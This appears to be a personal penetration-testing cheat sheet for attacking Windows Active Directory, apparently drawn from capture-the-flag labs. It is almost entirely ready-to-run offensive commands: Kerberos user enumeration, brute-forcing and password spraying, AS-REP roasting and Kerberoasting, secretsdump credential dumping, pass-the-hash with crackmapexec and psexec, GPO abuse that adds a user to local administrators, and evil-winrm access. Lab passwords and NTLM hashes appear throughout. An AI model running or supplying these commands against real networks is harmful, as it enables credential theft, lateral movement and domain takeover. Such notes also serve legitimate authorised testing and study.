RDP
xfreerdp +clipboard /u:<username> /p:<passwd> /v:<ip>
Python Bloodhound
python3 /root/BloodHound.py/bloodhound.py -c All,LoggedOn -u "t-skid" -p "tj072889*" -d VULNNET-RST.LOCAL -ns 10.10.238.153
GPO abuse
.\sharpgpo.exe --AddComputerTask --TaskName "Nothing" --Author vulnnet/administrator --command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
Null Session using rpcclient
rpcclient -U "" -N 10.10.10.172
Brute forces valid active directory accounts through Kerberos Pre-Authentication
--dc
- location of the Domain Controller (KDC) to target
-d
- Full domain
bruteforce
Bruteforce username:password combos, from a file or stdin
bruteuser
Bruteforce a single user's password from a wordlist
passwordspray
Test a single password against a list of users
userenum
Enumerate valid domain usernames via Kerberos
./kerbrute userenum --dc intelligence.htb -d intelligence.htb users.lst
for user in $(cat <users dir>); do ./kerbrute bruteuser --dc <IP> -d marvel.local <dir pass> $user; done
- Runs kerbrute multipe times testing each password with the user
./kerbrute passwordspray --dc <IP> -d marvel.local <dir userlist> 'password'
- Have a password but need to spray it against users throughout the domain
python GetNPUsers.py <domain>/<user> -no-pass
python secretsdump.py -just-dc backup@spookysec.local
GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
- Kerberoasting
Asrep roasting
python3 /root/impacket/examples/GetNPUsers.py -dc-ip 10.10.10.161 -usersfile users.lst htb/
When the IPC$ share is readable you can lkook to enumerate users with lookupsid.py
Options
winrm
own stuff using WINRM
ssh
own stuff using SSH
smb
own stuff using SMB
ldap
own stuff using ldap
mssql
own stuff using MSSQL
Enumeration for null session -
crackmapexec smb -u '' -p ''
crackmapexec smb -u 'guest' -p ' '
crackmapexec smb windcorp.thm -u 'lilyle' -p 'ChangeMe#1234' --rid-brute
crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876
crackmapexec <ip/CIDR> -u <user> -d <domain> -p <passwd>
- In a network you find the computers that have the password you've obtained. (Pass the Password)
crackmapexec <ip/CIDR> -u <user> -H <hash> --local
- Passing the hash around the network, seeing which credentials are pwned. (Pass the Hash)
crackmapexec smb 192.168.1.0/24 -u fcastle -d MARVEL.local -p Password1
add ons(--sam) (if works)
psexec.py marvel/fcastle:Password1@192.168.1.86
crackmapexec smb 192.168.1.0/24 -u "Frank Castle" -H 64f12cddaa88057e06a81b54e73b949b --local-auth
(passing the hash throughout an network)
psexec.py "Frank Castle":@192.168.1.86 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b
- (use of the NM hash also)
secretsdump.py
secretsdump.py marvel/fcastle:Password1@192.168.1.86
####Enumerating SMB
metasploit modules -
auxiliary/scanner/smb/smb_version
- detection of version SMB
smbclient -L \\\\<Target IP>\\
- enumeration of shares
exploit/windows/smb/psexec
- Obtaining local hashes on a machine
-load incognito
evil-winrm -i 10.10.92.93 -u Administrator -p 'P@$$W0rd'
evil-winrm -i 10.10.159.33 -u Administrator -H <hash>